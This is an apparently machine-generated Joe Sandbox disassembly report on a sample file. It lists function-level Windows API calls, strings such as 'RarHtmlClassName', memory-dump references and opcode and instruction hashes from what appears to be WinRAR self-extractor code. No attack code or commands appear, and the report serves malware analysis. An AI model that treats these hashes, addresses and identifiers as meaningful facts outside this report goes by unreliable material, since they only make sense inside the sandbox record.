                                                                                                                                                                                              • Instruction ID: 83f2fbe70e961c3ac303c5d9b6566ac8d02e16f2ef6a794cb9ec7e93fdba0aff
                                                                                                                                                                                              • Opcode Fuzzy Hash: e169954f1fb316bd3dac6e6a4985626b4ac39aec1728b8e213e16f9987eaba8c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A21A232604219BFD2229F67ED4AFBB3B6EFB4AB51F010014F6409A094CB969D01FB35
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,8E54D038,00000001,00000000,00000000,?,?,00FAAF6C,ROOT\CIMV2), ref: 00FBFD99
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00FAAF6C,ROOT\CIMV2), ref: 00FBFE14
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00FBFE1F
                                                                                                                                                                                              • _com_issue_error.COMSUPP ref: 00FBFE48
                                                                                                                                                                                              • _com_issue_error.COMSUPP ref: 00FBFE52
                                                                                                                                                                                              • GetLastError.KERNEL32(80070057,8E54D038,00000001,00000000,00000000,?,?,00FAAF6C,ROOT\CIMV2), ref: 00FBFE57
                                                                                                                                                                                              • _com_issue_error.COMSUPP ref: 00FBFE6A
                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,00FAAF6C,ROOT\CIMV2), ref: 00FBFE80
                                                                                                                                                                                              • _com_issue_error.COMSUPP ref: 00FBFE93
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1353541977-0
                                                                                                                                                                                              • Opcode ID: 7d1238aa2fb24526458c62915205a14cb8be114d8b9e75abb648384daf044fb0
                                                                                                                                                                                              • Instruction ID: 296fcfb295c0ef2c5955018e0d417ec365936ed76f0e115f1c395cdb3637e90b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d1238aa2fb24526458c62915205a14cb8be114d8b9e75abb648384daf044fb0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D411CB1E00219ABC7109F69CC45BEEBBA9EB48720F10823AF905E7251D734D904EFE1
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                                                              • API String ID: 3519838083-3505469590
                                                                                                                                                                                              • Opcode ID: 2f0c4af956bdeb470ef1fcde79cb60330e0f5fdcfaa0ec1de579c0bfab6fc59d
                                                                                                                                                                                              • Instruction ID: ba2162ccbfd18d93bae66de87150e38c7dc683611c6a0a901ed228f25cb8b9fb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f0c4af956bdeb470ef1fcde79cb60330e0f5fdcfaa0ec1de579c0bfab6fc59d
                                                                                                                                                                                              • Instruction Fuzzy Hash: AD718CB1A00219AFDF14DFA4CC959AFB7B9FF4A311B04415EE512A72A0CB30AD05EB61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FA9387
                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00FA93AA
                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00FA93C9
                                                                                                                                                                                                • Part of subcall function 00FAC29A: _wcslen.LIBCMT ref: 00FAC2A2
                                                                                                                                                                                                • Part of subcall function 00FB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FAC116,00000000,.exe,?,?,00000800,?,?,?,00FB8E3C), ref: 00FB1FD1
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FA9465
                                                                                                                                                                                                • Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5
                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00FA94D4
                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00FA9514
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                              • String ID: rtmp%d
                                                                                                                                                                                              • API String ID: 3726343395-3303766350
                                                                                                                                                                                              • Opcode ID: 54de9f81880a0e07a36a2d42cfa0922f91b4f48941aafc784da64ab7260dd2b7
                                                                                                                                                                                              • Instruction ID: 107cfa99944c5fed91d705ebfb38a66af7e2b8bb33779b8fffc4ab2da4994720
                                                                                                                                                                                              • Opcode Fuzzy Hash: 54de9f81880a0e07a36a2d42cfa0922f91b4f48941aafc784da64ab7260dd2b7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E4174F1D0425869CF21EBA0CC45ADE73BDAF46340F0488B5B609E3051EB788B89EB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00FB122E
                                                                                                                                                                                                • Part of subcall function 00FAB146: GetVersionExW.KERNEL32(?), ref: 00FAB16B
                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00FB1251
                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00FB1263
                                                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00FB1274
                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB1284
                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB1294
                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00FB12CF
                                                                                                                                                                                              • __aullrem.LIBCMT ref: 00FB1379
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1247370737-0
                                                                                                                                                                                              • Opcode ID: 34fdac94e065e2196f6ea6349fec9e10da35fd2d2c8ae410fb542b69dd8e6df1
                                                                                                                                                                                              • Instruction ID: 2b4c2d74e64d2d6fc045c467f1783291c6de0c5d741899cee1e51cde923b4892
                                                                                                                                                                                              • Opcode Fuzzy Hash: 34fdac94e065e2196f6ea6349fec9e10da35fd2d2c8ae410fb542b69dd8e6df1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D41F8B19083069FC710DF65C8849ABBBE9FB88314F44892EF596C2650E738E549EF52
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FA2536
                                                                                                                                                                                                • Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5
                                                                                                                                                                                                • Part of subcall function 00FB05DA: _wcslen.LIBCMT ref: 00FB05E0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                              • API String ID: 3053425827-2277559157
                                                                                                                                                                                              • Opcode ID: 27459187cfc9ad7062439429ae93a3b433d73fa984c3b0e9dfb42b03db7e7b1d
                                                                                                                                                                                              • Instruction ID: 0ff83809c2033c2dfd796f0b6129be5238e10f5a2def25d570b31a79becd2c50
                                                                                                                                                                                              • Opcode Fuzzy Hash: 27459187cfc9ad7062439429ae93a3b433d73fa984c3b0e9dfb42b03db7e7b1d
                                                                                                                                                                                              • Instruction Fuzzy Hash: D2F14BF0B043809BCB14DF2C8895BFE77996F92310F08456DFD869B243CB689945E7A2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                                                                              • API String ID: 176396367-3568243669
                                                                                                                                                                                              • Opcode ID: d3d1b89d122a0cc17ec1e437f531882d084b55cbc0f5ed2bbb9abadb4d10fb4e
                                                                                                                                                                                              • Instruction ID: 8e93c08f262b3211d11929de971c1f82771e12b8dedca03c05bf8c20b425fa2c
                                                                                                                                                                                              • Opcode Fuzzy Hash: d3d1b89d122a0cc17ec1e437f531882d084b55cbc0f5ed2bbb9abadb4d10fb4e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1451F856B4832295DB309A279C117F673E1DFA5770F68441AFBC18B2C0FBE9CC41AA61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00FCFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00FCF6CF
                                                                                                                                                                                              • __fassign.LIBCMT ref: 00FCF74A
                                                                                                                                                                                              • __fassign.LIBCMT ref: 00FCF765
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00FCF78B
                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,00FCFE02,00000000,?,?,?,?,?,?,?,?,?,00FCFE02,00000000), ref: 00FCF7AA
                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,00FCFE02,00000000,?,?,?,?,?,?,?,?,?,00FCFE02,00000000), ref: 00FCF7E3
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                              • Opcode ID: c4e74556a2b5f6022be67658db685d033709dae1f5d649879f88cccb4abc0d41
                                                                                                                                                                                              • Instruction ID: eab53a6e15206daf5ad0286656350e17e28aad01a1cbef315f4e13c0a8ab89ef
                                                                                                                                                                                              • Opcode Fuzzy Hash: c4e74556a2b5f6022be67658db685d033709dae1f5d649879f88cccb4abc0d41
                                                                                                                                                                                              • Instruction Fuzzy Hash: BE5170B1D0024A9FCB10CFA4D946FEEFBB5EF09310F14416AE555E7291D670A944DBA0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00FC2937
                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00FC293F
                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00FC29C8
                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00FC29F3
                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00FC2A48
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                              • Opcode ID: a5f28cf174a3c4d793d300c1d889856764e2ef014f5654525f2e3df1ef2814f6
                                                                                                                                                                                              • Instruction ID: a3e2efac2c42ab7b364b7d764dd994a23bebfe6697d790cdb294a5b2c512249b
                                                                                                                                                                                              • Opcode Fuzzy Hash: a5f28cf174a3c4d793d300c1d889856764e2ef014f5654525f2e3df1ef2814f6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2341C534E0020AAFCF50DF28C982F9E7BB1EF44324F14805AE8156B392DB75DA15EB91
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00FB9EEE
                                                                                                                                                                                              • GetWindowRect.USER32(?,00000000), ref: 00FB9F44
                                                                                                                                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00FB9FDB
                                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00FB9FE3
                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00FB9FF9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$Show$RectText
                                                                                                                                                                                              • String ID: RarHtmlClassName
                                                                                                                                                                                              • API String ID: 3937224194-1658105358
                                                                                                                                                                                              • Opcode ID: 0bb64b7f5addd5dfb3b177dc79f1c59ce31cf4c61280999ff6d2ad6743139f8d
                                                                                                                                                                                              • Instruction ID: eb12e1b26cff43d5a3d51bbf2610644a72511fafcd89efc5d2be1251b0b8be94
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bb64b7f5addd5dfb3b177dc79f1c59ce31cf4c61280999ff6d2ad6743139f8d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C41D232408314EFC7226F659C49BAB7BB8FF48761F004519F9859904ACB79D854EF61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                                              • API String ID: 176396367-3743748572
                                                                                                                                                                                              • Opcode ID: 250fe3547d55522045bee7945113ec88869e16fdfff9b54684a1eb8772d66de3
                                                                                                                                                                                              • Instruction ID: c9956cd1d7b07029d6df02ec48b1a9ccb6355e389ba640cd3786623a8feb388e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 250fe3547d55522045bee7945113ec88869e16fdfff9b54684a1eb8772d66de3
                                                                                                                                                                                              • Instruction Fuzzy Hash: E9318032A4C30656D630AB515C43BF673A8EB40730F50841FFA82972C0FAE8ED44A7A1
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FCC868: _free.LIBCMT ref: 00FCC891
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC8F2
                                                                                                                                                                                                • Part of subcall function 00FC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?), ref: 00FC8DE2
                                                                                                                                                                                                • Part of subcall function 00FC8DCC: GetLastError.KERNEL32(?,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?,?), ref: 00FC8DF4
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC8FD
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC908
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC95C
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC967
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC972
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC97D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                                              • Instruction ID: 5483f74e04e39b741b4816a659fa22ef205eb51502bfbf097f93725a1cce3d4e
                                                                                                                                                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A110071580706A6E520B771DD07FCB7BBC9F04B00F804C1DF2DE660D2DA6AA506A790
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00FBE669,00FBE5CC,00FBE86D), ref: 00FBE605
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00FBE61B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00FBE630
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                              • API String ID: 667068680-1718035505
                                                                                                                                                                                              • Opcode ID: ba4c0d484c4e40e0559174937670b913727e0c0a19f3e7430c191962f58be8cf
